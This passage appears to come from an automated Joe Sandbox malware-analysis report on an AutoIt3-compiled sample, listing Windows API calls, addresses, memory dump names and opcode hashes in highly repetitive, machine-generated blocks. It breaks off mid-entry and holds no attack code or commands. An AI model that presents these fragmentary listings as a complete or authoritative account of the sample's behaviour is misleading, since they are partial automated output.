                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B67F20,00B67F64), ref: 00B2B93C
                                • CloseHandle.KERNEL32 ref: 00B2B94E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memset$CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3277943733-0
                                • Opcode ID: 1f47dc2a633822f75cda926ba8c78c0e41272b16e7a1c2bb0bc18802888718d1
                                • Instruction ID: 038d382c2a70b1a2da9a17f797291c1d94b16d87fc99b6e11818601995477422
                                • Opcode Fuzzy Hash: 1f47dc2a633822f75cda926ba8c78c0e41272b16e7a1c2bb0bc18802888718d1
                                • Instruction Fuzzy Hash: EDF05EB35943507BF6106761AC15FBB3A9CEB09358F004070FA08D6192DFBA490087A8
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 00B06E88
                                  • Part of subcall function 00B0794E: _memset.LIBCMT ref: 00B07983
                                • _memmove.LIBCMT ref: 00B06EAB
                                • _memset.LIBCMT ref: 00B06EB8
                                • LeaveCriticalSection.KERNEL32(?), ref: 00B06EC8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                • String ID:
                                • API String ID: 48991266-0
                                • Opcode ID: a358f08bf6e884dba466d47d9c8b307e09ac2f1ca96fe8e60b39593135f86219
                                • Instruction ID: 13780b2e2c6ed24d1c661dda8ab83e679ea6794323e88844c2a0896be5f29789
                                • Opcode Fuzzy Hash: a358f08bf6e884dba466d47d9c8b307e09ac2f1ca96fe8e60b39593135f86219
                                • Instruction Fuzzy Hash: B0F0303A200200ABCF116F55DC85E99BB69EF49320B04C065FE085F25ACB31A911CBB4
                                APIs
                                  • Part of subcall function 00AA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
                                  • Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA135C
                                  • Part of subcall function 00AA12F3: BeginPath.GDI32(?), ref: 00AA1373
                                  • Part of subcall function 00AA12F3: SelectObject.GDI32(?,00000000), ref: 00AA139C
                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C030
                                • LineTo.GDI32(00000000,?,?), ref: 00B2C03D
                                • EndPath.GDI32(00000000), ref: 00B2C04D
                                • StrokePath.GDI32(00000000), ref: 00B2C05B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                • String ID:
                                • API String ID: 1539411459-0
                                • Opcode ID: bfb4ee33d53bffc3e8f44c133b1147eacf57a2468cd2acb33697f19d1ef82a00
                                • Instruction ID: ce3305334b596a750643f0b1fb1f4576c562c2e6344637525084741cf839fae9
                                • Opcode Fuzzy Hash: bfb4ee33d53bffc3e8f44c133b1147eacf57a2468cd2acb33697f19d1ef82a00
                                • Instruction Fuzzy Hash: BFF0E93100021AF7DB221F50AC09FDF3FA4AF05711F144021FA11630E28BB54565CFD9
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFA399
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFA3AC
                                • GetCurrentThreadId.KERNEL32 ref: 00AFA3B3
                                • AttachThreadInput.USER32(00000000), ref: 00AFA3BA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                • String ID:
                                • API String ID: 2710830443-0
                                • Opcode ID: 24e437ad8ae6fe9806d30efeb95f1880c4079fcde96c61102be5e6393410b104
                                • Instruction ID: ecf8a9344e3f5737207f57b0cf778e0aa7a7b1f1031d6ddbc4281f5bd95e913c
                                • Opcode Fuzzy Hash: 24e437ad8ae6fe9806d30efeb95f1880c4079fcde96c61102be5e6393410b104
                                • Instruction Fuzzy Hash: E4E03975541228BADB211FA2DD0CEF73F6CEF267A2F008134F6089A060CA759541DBA0
                                APIs
                                • GetSysColor.USER32(00000008), ref: 00AA2231
                                • SetTextColor.GDI32(?,000000FF), ref: 00AA223B
                                • SetBkMode.GDI32(?,00000001), ref: 00AA2250
                                • GetStockObject.GDI32(00000005), ref: 00AA2258
                                • GetWindowDC.USER32(?,00000000), ref: 00ADC0D3
                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ADC0E0
                                • GetPixel.GDI32(00000000,?,00000000), ref: 00ADC0F9
                                • GetPixel.GDI32(00000000,00000000,?), ref: 00ADC112
                                • GetPixel.GDI32(00000000,?,?), ref: 00ADC132
                                • ReleaseDC.USER32(?,00000000), ref: 00ADC13D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                • String ID:
                                • API String ID: 1946975507-0
                                • Opcode ID: 8d23f34ac7c9225d0dce1a40e8814e41dc75d171c3d40bd9880db8d22cc76141
                                • Instruction ID: 5c55759c8c8c76ec601e621b3a57ca15773bbfcf0a809b5909635d47ed648939
                                • Opcode Fuzzy Hash: 8d23f34ac7c9225d0dce1a40e8814e41dc75d171c3d40bd9880db8d22cc76141
                                • Instruction Fuzzy Hash: E1E06D32100246EADB315F78FC0DBE83B30EB15332F448376FA69590E18B7189A1DB12
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 00AF8C63
                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AF882E), ref: 00AF8C6A
                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AF882E), ref: 00AF8C77
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AF882E), ref: 00AF8C7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CurrentOpenProcessThreadToken
                                • String ID:
                                • API String ID: 3974789173-0
                                • Opcode ID: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
                                • Instruction ID: eae56ce3250f0c8ef2153eb735b911c4a1abd2c907e9ee9103c4b161357c8b4d
                                • Opcode Fuzzy Hash: 1af1eb3a6a26d5ee36d3c3c13a20b636784bec647339f5ded2e4c5d55353eca5
                                • Instruction Fuzzy Hash: B1E04F36642212DBD7705FF06D0DB673BB8AF55792F044838B245CB040DE3884438B65
                                APIs
                                • GetDesktopWindow.USER32 ref: 00AE2187
                                • GetDC.USER32(00000000), ref: 00AE2191
                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE21B1
                                • ReleaseDC.USER32(?), ref: 00AE21D2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: a2026a10badbe68d67b98b71e9b9d84a80a6a644509b6ef6d718cbb846d40eec
                                • Instruction ID: 4ae8f6792b285807fb0d8603a2b23fa5f4405d0cf58a712a1a3c5a8155367d27
                                • Opcode Fuzzy Hash: a2026a10badbe68d67b98b71e9b9d84a80a6a644509b6ef6d718cbb846d40eec
                                • Instruction Fuzzy Hash: 89E01AB5800215EFDB229F60C908AAE7BF5EB4C350F108425F95AD7260DB388142DF40
                                APIs
                                • GetDesktopWindow.USER32 ref: 00AE219B
                                • GetDC.USER32(00000000), ref: 00AE21A5
                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AE21B1
                                • ReleaseDC.USER32(?), ref: 00AE21D2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 453a17d695df79249f8ef26fc62ae4678ecf9c403a9ae2b5904c8db646cc762d
                                • Instruction ID: 526be37301285dad8c59a4882f123090ef07a28cb9d4746d4a1de1e3cdffc26c
                                • Opcode Fuzzy Hash: 453a17d695df79249f8ef26fc62ae4678ecf9c403a9ae2b5904c8db646cc762d
                                • Instruction Fuzzy Hash: EAE01A75800205AFCB229F70C9086AE7BF1EB4C350F108025F95AD7260DB389142DF40
                                APIs
                                • OleSetContainedObject.OLE32(?,00000001), ref: 00AFB981
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ContainedObject
                                • String ID: AutoIt3GUI$Container
                                • API String ID: 3565006973-3941886329
                                • Opcode ID: 49f5ba31f8381c08fbdbfa771b65ffe495a3290aabb50de80323afab3ef19af1
                                • Instruction ID: 2cbad55b597a2df61adb279fd628c78aad129ee49f7b42f2875652bf68aa675d
                                • Opcode Fuzzy Hash: 49f5ba31f8381c08fbdbfa771b65ffe495a3290aabb50de80323afab3ef19af1
                                • Instruction Fuzzy Hash: 51912970610605DFDB24DF68C884B6AB7F9BF48750F24856EFA49CB6A1DB70E841CB60
                                APIs
                                  • Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • __wcsnicmp.LIBCMT ref: 00B0B298
                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B0B361
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                • String ID: LPT
                                • API String ID: 3222508074-1350329615
                                • Opcode ID: a343fdc2411bd9661f25f51104f8c22a9963cb08f26ef095f85b6e1e4b014fbd
                                • Instruction ID: d84bd153d2c4c4cdbc19733f86863ebd59fa2745b51f035fb7e91d693a208ed9
                                • Opcode Fuzzy Hash: a343fdc2411bd9661f25f51104f8c22a9963cb08f26ef095f85b6e1e4b014fbd
                                • Instruction Fuzzy Hash: EE615075A00215AFCB14DF94C985EAEBBF4EF09310F1540AAF946AB2A1DB70AE40CB54
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 00AB2AC8
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00AB2AE1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: GlobalMemorySleepStatus
                                • String ID: @
                                • API String ID: 2783356886-2766056989
                                • Opcode ID: 6ecff0d2c1b05ed9611a5fb83eb7c5fe74e8cf351a8a869654b5f19cc78e66dd
                                • Instruction ID: 67dc64c89a762c878ed8774382f43e814535e60405470d780ad37a1d3c84b930
                                • Opcode Fuzzy Hash: 6ecff0d2c1b05ed9611a5fb83eb7c5fe74e8cf351a8a869654b5f19cc78e66dd
                                • Instruction Fuzzy Hash: 925146715187449BD320AF10D886BABBBF8FF86350F42885DF1D9921A1EF308529CB26
                                APIs
                                  • Part of subcall function 00AA506B: __fread_nolock.LIBCMT ref: 00AA5089
                                • _wcscmp.LIBCMT ref: 00B09AAE
                                • _wcscmp.LIBCMT ref: 00B09AC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _wcscmp$__fread_nolock
                                • String ID: FILE
                                • API String ID: 4029003684-3121273764
                                • Opcode ID: 123f85d82fda4f846e968682d7a8d256d334c653f442f58d5106ffdac658c832
                                • Instruction ID: b83d7b64c3809ebccdd511a125d4f475ccfad78b1d80eb37a12033e831d4bddf
                                • Opcode Fuzzy Hash: 123f85d82fda4f846e968682d7a8d256d334c653f442f58d5106ffdac658c832
                                • Instruction Fuzzy Hash: 7B41B571A00619BEDF219AA4DC85FEFBBF9DF45710F0040B9B900B71C1DBB5AA058BA5
                                APIs
                                • _memset.LIBCMT ref: 00B12892
                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B128C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CrackInternet_memset
                                • String ID: |
                                • API String ID: 1413715105-2343686810
                                • Opcode ID: aa41589c18b4b9b80940043369390f6ab3977e36e8fe3e4e212d8ce16b1989e3
                                • Instruction ID: 5b5170b1e700024cd4caa44cef67df2f07c00ad586cc1ac2c1d01dfe229cebdb
                                • Opcode Fuzzy Hash: aa41589c18b4b9b80940043369390f6ab3977e36e8fe3e4e212d8ce16b1989e3
                                • Instruction Fuzzy Hash: 72315971800119AFCF01EFA4DD85EEEBFB9FF09340F104069F814A6166EB355A96DBA0
                                APIs
                                • DestroyWindow.USER32(?,?,?,?), ref: 00B26D86
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B26DC2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$DestroyMove
                                • String ID: static
                                • API String ID: 2139405536-2160076837
                                • Opcode ID: ef9b59374f8ad76d444e156e163c99b87ce67a694e7a429841fcd0d40042f4c2
                                • Instruction ID: 77adc49b5d6cf367ba895678755aa699295934efac53b4b1300be226485f7f33
                                • Opcode Fuzzy Hash: ef9b59374f8ad76d444e156e163c99b87ce67a694e7a429841fcd0d40042f4c2
                                • Instruction Fuzzy Hash: 48317071200618AADB109F78DC80AFB77F9FF49760F108629F99997190DB31AC92CB60
                                APIs
                                • _memset.LIBCMT ref: 00B02E00
                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B02E3B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: InfoItemMenu_memset
                                • String ID: 0
                                • API String ID: 2223754486-4108050209
                                • Opcode ID: 0a1073e42db564cc0a64c3ffbea43af87c9a60b5bdef799e9735988840c8e5c1
                                • Instruction ID: b3e6e34fe90dc4f66da5b48f763545c235fc2004a06c009fcd084701a78f383c
                                • Opcode Fuzzy Hash: 0a1073e42db564cc0a64c3ffbea43af87c9a60b5bdef799e9735988840c8e5c1
                                • Instruction Fuzzy Hash: 3931D531A40305ABEB248F58C989BAEBFF9EF05350F1440AEED85971E1DB709948CB50
                                APIs
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B269D0
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B269DB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
